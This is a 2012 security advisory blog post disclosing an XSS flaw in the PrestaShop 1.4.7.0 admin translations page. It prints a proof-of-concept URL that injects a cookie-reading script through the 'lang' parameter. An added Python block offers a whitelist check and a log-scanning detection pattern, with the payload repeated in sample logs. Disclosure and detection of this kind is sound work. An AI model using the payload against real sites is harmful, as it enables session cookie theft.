Sunday, 18 March 2012

[EN] PrestaShop 1.4.7.0 - XSS for logged-in users


# TITLE ....... # PrestaShop 1.4.7.0 XSS for logged-in users ............ #
# DATE ........ # 14.03.2012 ............................................ #
# AUTHOR ...... # http://hauntit.blogspot.com ........................... #
# SOFT LINK ... # http://www.prestashop.com ............................. #
# VERSION ..... # 1.4.7.0 ............................................... #
# TESTED ON ... # LAMP .................................................. #
# ....................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is the bug :)
# 4. More...

#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
XSS for logged-in users.

#............................................#
# 3. Where is the bug :)

Log in as your 'normal user'.
And enjoy:
http:///prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=/*<script>alert(document.cookie)</script>/*&type=front&token=your.token
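The `lang` parameter in the PoC above is expected to carry a short language code, so the defensive fix is a whitelist check rather than output escaping alone. The following is an added example, not PrestaShop code and not part of the original advisory: it validates `lang` against a configured set of codes (the set and the `shop.example` host are assumptions) and runs the same check over a few constructed access-log lines to surface requests that carry a non-code value into `tab=AdminTranslations`.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed copy of the advisory's PoC URL; the host is a placeholder (the advisory leaves it blank).
ADVISORY_URL = ("http://shop.example/prestashop_1.4.7.0/admin12/index.php"
                "?tab=AdminTranslations&lang=/*<script>alert(document.cookie)</script>/*"
                "&type=front&token=your.token")

# A language code is a short lowercase ISO-639 identifier, optionally with a region part ("pt-br").
LANG_RE = re.compile(r"^[a-z]{2}(-[a-z]{2})?$")

# Assumed set of codes the shop has installed; a real deployment would load this from configuration.
ALLOWED_LANGS = ("en", "fr", "es", "de", "pt-br")

def validate_lang(value, allowed=ALLOWED_LANGS):
    """Whitelist check: return the code if well-formed and configured, otherwise None."""
    if value is None or not LANG_RE.match(value):
        return None
    return value if value in allowed else None

def lang_from_url(url):
    """Extract the raw (percent-decoded) lang parameter from a URL or request path."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("lang", [None])[0]

# Markers that make a rejected value worth a closer look in the log review.
SUSPICIOUS = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)

def flag_log_lines(lines):
    """Return (line_no, decoded_lang, looks_like_script) for AdminTranslations
    requests whose lang value fails the whitelist check."""
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            path = line.split('"')[1].split(" ")[1]   # request line: METHOD path HTTP/x
        except IndexError:
            continue
        qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
        if qs.get("tab", [""])[0] != "AdminTranslations":
            continue
        lang = qs.get("lang", [None])[0]
        if lang is not None and validate_lang(lang) is None:
            hits.append((n, lang, bool(SUSPICIOUS.search(lang))))
    return hits

# Constructed Apache-style access log lines: a benign request, the PoC (percent-encoded), and an unrelated tab.
LOG = [
    '203.0.113.5 - - [14/Mar/2012:10:01:02 +0100] "GET /admin12/index.php?tab=AdminTranslations&lang=en&type=front&token=abc HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Mar/2012:10:01:09 +0100] "GET /admin12/index.php?tab=AdminTranslations&lang=/*%3Cscript%3Ealert(document.cookie)%3C/script%3E/*&type=front&token=abc HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Mar/2012:10:02:30 +0100] "GET /admin12/index.php?tab=AdminOrders&token=abc HTTP/1.1" 200 900',
]
```

Running `flag_log_lines(LOG)` reports only the second line; the whitelist also rejects values such as `EN` or `en_US` that are not in the configured set, so tighten `ALLOWED_LANGS` to what the shop actually ships.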


#............................................#
# 4. More...

- http://www.prestashop.com
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#

2 comments:

  1. In my opinion PrestaShop is one of the best e-store software packages!

  2. Yeah, I agree. PrestaShop themes are really the best templates you can use to get a professional-looking shopping website. The good thing about PrestaShop is that it's open-source and customizable.